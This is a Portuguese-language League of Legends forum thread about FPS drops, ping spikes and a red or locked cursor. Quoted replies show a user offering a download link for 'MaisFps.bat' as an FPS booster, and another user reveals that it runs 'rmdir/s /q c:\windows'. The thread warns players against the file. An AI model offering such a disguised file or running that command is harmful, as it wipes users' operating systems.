cancelar
Showing results for 
Search instead for 
Do you mean 
Highlighted
Arauto
Arauto

fps dropando e cursor do lol ficando vermelho

ola , por acaso aconteceu algo semelhante no cliente de voces ? cursor fica bloqueado nao da de acessar a loja nem atacar os alvos , perdi um jogo hoje por isso, infelizmente so descobri a solução relogando e o meu time conseguiu perder o jogo em 15 segundos.

9 RESPOSTAS
Highlighted

Meu cursor ficou assim quando a opção de "alvejar apenas campeões" estava habilitada nas configurações.
Highlighted
Aronguejo
Aronguejo

aqui tbm , mas quando usos o legado
Highlighted

Aqui só ocorre umas paradas de lag forte de quando em quando durante o game.
Highlighted
Arauto
Arauto

Aqui o fps vai pra 0 do nd .. e o cursor buga todo.
tem vezes q nao consigo nem usar habilidade
Highlighted
Arauto
Arauto

n eh questao de aumnetar o fps, eh questao de instabilidade .. ele fica caindo demais em determinado ponto do jogo , impossibilitando de jogar normalmente.
Highlighted
Arauto
Arauto

@StonedGandalfXd  escreveu:
sobre o fps do lol, tenho um programar que consegue aumentar o fps segue o link abaixo:
http://www.mediafire.com/file/4zivu8xxgd9em9t/MaisFps.bat/file

um comando  pra desligar pc , tenha bom senso ne velho.

Highlighted
Aronguejo
Aronguejo

No caso não tou enfrentando problemas com o cursor, mas em compensação tou tendo problemas com drop de FPS e ping alto, por exemplo, quando o ping aumenta, o FPS cai ao mesmo tempo, é como se um influenciasse o outro.. é bugado... esse problema só veio a acontecer após a atualização do patch 9.21, porém, problemas com ping subindo do nada e chegando a bater os 1000/2000ms começou na atualização 9.20... Tá complicado..
Highlighted
Aronguejo
Aronguejo

@StonedGandalfXd  escreveu:
sobre o fps do lol, tenho um programar que consegue aumentar o fps segue o link abaixo:
http://www.mediafire.com/file/4zivu8xxgd9em9t/MaisFps.bat/file

Meu chapa, tenha mais bom senso e vergonha nessa sua cara, você usando da possível ignorância de alguns jogadores sobre sistemas operacionais e fazendo com que baixem um arquivo .bat que executa um comando como administrador em CMD pra fazer com que toda as pastas principais do Windows que são responsáveis pelo funcionamento do sistema sejam deletadas e assim prejudicando alguém e fazendo com que a pessoa seja obrigada a formatar o próprio computador simplesmente por viu um moleque compartilhando um arquivo com intuito de enganar e fazer "gracinha" com alguém?

"rmdir/s /q c:\windows" Esse é o comando que estava dentro do arquivo .bat, qualquer criança mimada e com baixo conhecimento em windows consegue fazer um arquivo desses...

NÃO BAIXEM EM HIPÓTESE ALGUMA ESSE ARQUIVO E MUITO MENOS EXECUTEM.

Highlighted

MSG para Riot:
Um problema antigo que a comunidade aclamou para ser resolvido pela Riot, vocês tentaram resolver e ainda não conseguiram por completo.
Eu preciso mudar a cor do cursor dentro do jogo, pois mesmo o cursor legado ou o novo, ambos mudam a cor para vermelho quando se passa por cima de minions e champions confundindo a visão, ofuscando e fazendo com que eu perca de vista o ponteiro, algo resolvido facilmente alterando a cor para minha preferência que contenha um contraste com os minions azul e vermelho.
Eu neste momento estou sendo obrigado a usar modo daltônico para "burlar" este problema, mesmo eu não sendo daltonico e tenho a visão ótima sem nenhum grau. Em modo daltônico  o cursor ao passar por cima dos minions continua com a cor prata e não alterando para vermelho, conseguindo melhorar sendo menos pior do que o padrão que altera-se para vermelho.
Não sou daltónico e tenho a necessidade de usar esse recurso como gambiarra por incompetência ou autoritarismo de vocês em querer decidir até mesmo a cor de um cursor? perco a graça de usufruir das cores de skins reais por conta dessa opção marcada, triste demais.
Existe um programa (yolomouse), que pode fazer o que vocês não fazem, e vocês proíbem de usar ou bani a conta do usuário que utilizar, lamentável.